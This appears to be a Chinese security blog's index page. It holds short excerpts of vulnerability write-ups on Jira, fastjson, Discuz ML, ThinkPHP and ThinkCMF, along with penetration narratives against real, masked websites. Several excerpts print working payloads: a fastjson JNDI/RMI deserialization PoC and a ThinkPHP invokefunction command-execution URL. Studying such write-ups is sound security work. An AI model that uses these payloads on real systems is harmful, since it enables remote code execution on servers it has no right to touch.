博客主机

JIRA服务器模板注入漏洞 (CVE-2019-11581)

JIRA服务器模板注入漏洞 (CVE-2019-11581)
0x00 前言 https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html JIRA官方发布安全通告修复了一个服务器端的模板注入漏洞(CVE-2019-11581),影响Jira Server和Jira Data Center。成功利用该漏洞的攻击者可以在受影响服务器上远程执行代码 我司也有用相关产品,所以马上查看了一下是否影响 0x01 Jira简介 JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于...
博客主机

密码保护:FastJson 反序列化学习

密码保护:FastJson 反序列化学习
0x01 概述 主要是本次某*行动,据传闻有个fastjson的0day,我就很好奇,刚好自己之前没有学习过这个东西,所以蹭着这个时间把这个学习一下。 0x02 分析过程 什么是fastjson Fastjson是一个由阿里巴巴维护的一个json库。它采用一种“假定有序快速匹配”的算法,是号称Java中最快的json库。最早的通告在这里。而fastjson的用法可以先看看下面这个例子。 先定义一个User类 package com.l1nk3r.fastjson; publ...

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析
poc {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版) 环境准备 阅读本篇文章之...

漏洞分析 | Discuz ML! V3.X 代码注入漏洞

漏洞分析 | Discuz ML! V3.X 代码注入漏洞
Discuz!ML V3.X 代码注入分析 代码来源:http://discuz.ml/download 作者:Web安全组-CoolCat 漏洞定位 在PoC的代码中填充'.1.'使得代码出错,定位出错代码文件: 代码报错 根据报错跟踪到source/module/portal/portal_index.php第32行 portal_index.php 代码 查看问题函数上方查看定义函数以及关联文件的位置,可以看到template函数在/source/function/function_core.php中,继续跟进。 函数从 524行一...

thinkPHP渗透之经验决定成败

thinkPHP渗透之经验决定成败
如上图,目标就一个登陆框,最近 Thinkphp 程序很多,根据后台地址结构,猜测可能是 ThinkPHP ,随手输入 xxx 得到 thinkPHP 报错页面,确定目标程序和版本。 然后上 5.X EXP 测试: 命令执行漏洞已经被修复了。。。 爆破?这验证码我没辙。。。 尝试读取日志瞅瞅,结果遇到防火墙 然后查了下 IP ,没有CDN,果断查下旁站,有那么几个站,目测都是 thinkPHP 爱站旁站查询其实并不准确,有的查不到,所以...

thinkPHP 5X 在PHP7以上环境下的 GETSHELL

thinkPHP 5X 在PHP7以上环境下的 GETSHELL
起因 thinkPHP 的命令执行漏洞已经过去好一阵子了,然而还有许多站并没有修复这个漏洞,今天恰巧让我遇到这么一个, 但是因为目标 PHP 版本是 7.2.14 导致 GETSHELL 变的异常麻烦,在各种折腾下最终成功,记录分享一波~ GETSHELL 过程 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\Request/input&filter=phpinfo&...

[漏洞案例]thinkcmf 2.x从sql注入到getshell实战

[漏洞案例]thinkcmf 2.x从sql注入到getshell实战
0X00 前言 这个案例是某项目的漏洞,涉及敏感的地方将会打码。 很久没更新博客了,放一篇上来除除草,新的一年会有所转变,以后会有更多领域的研究。 下面是正文   0X01 正文 某厂商某个网站用的是thinkcmf 2.2.3。   thinkcmf 2.2.3系统是存在漏洞的,参考先知上喵呜师傅写的一篇文章(https://xz.aliyun.com/t/3529 )   文章中提到了三个漏洞,一个注入,两个模板注入写shell。   ...

[漏洞分析]thinkcmf 1.6.0版本从sql注入到任意代码执行

[漏洞分析]thinkcmf 1.6.0版本从sql注入到任意代码执行
0x00 前言 该漏洞源于某真实案例,虽然攻击没有用到该漏洞,但在分析攻击之后对该版本的cmf审计之后发现了,也算是有点机遇巧合的味道,我没去找漏洞,漏洞找上了我XD thinkcmf 已经非常久远了,该版本看github上的更新时间已经是4年前了,也就是2014年的时候,那时候我没学安全呢。。。   0x01 前台sql注入 前台在登录方法中存在注入,thinkcmf是基于thinkphp3.2写的,直接看 文件application\User\C...

“净网2019”打击网络色情,实录渗透某成人“抖音”

“净网2019”打击网络色情,实录渗透某成人“抖音”
本文作者:曲云杰(MS08067实验室合伙人 & Web小组组长) 起因 经排查发现该app为成人版"抖音",响应国家净网行动,坚决打击非法传播传播淫秽物品行为! 经过 下载该app,并对其进行测试。 使用BurpSuite抓包,环境为: 夜神模拟器(安卓4)+Xpose框架+Just trust me 框架 发现该app是从某web地址:www.xxxxx.com的接口回调过来的。 排查web资产 域名注册信息 Ps:这类网站域名注册信息大部分为虚假...

Remote NTLM relaying through CS

Remote NTLM relaying through CS
0x00 为什么写这个? 最近在学习Exchange在提权中的应用的时候,碰到一个问题,即:如果我们现在拥有了一个内网的windows主机,如何利用这台主机使用CVE_2018_8581 ?大概的结构是这样: 攻击者通过某种方式获取一台域内主机权限。并获取了此主机的域成员账号密码,在获取DC及Exchange Server的ip地址后,利用CVE_2018_8581 0x01 利用思路 思路一:编译py版的impacket 在做这个的时候,第一想法就是有没...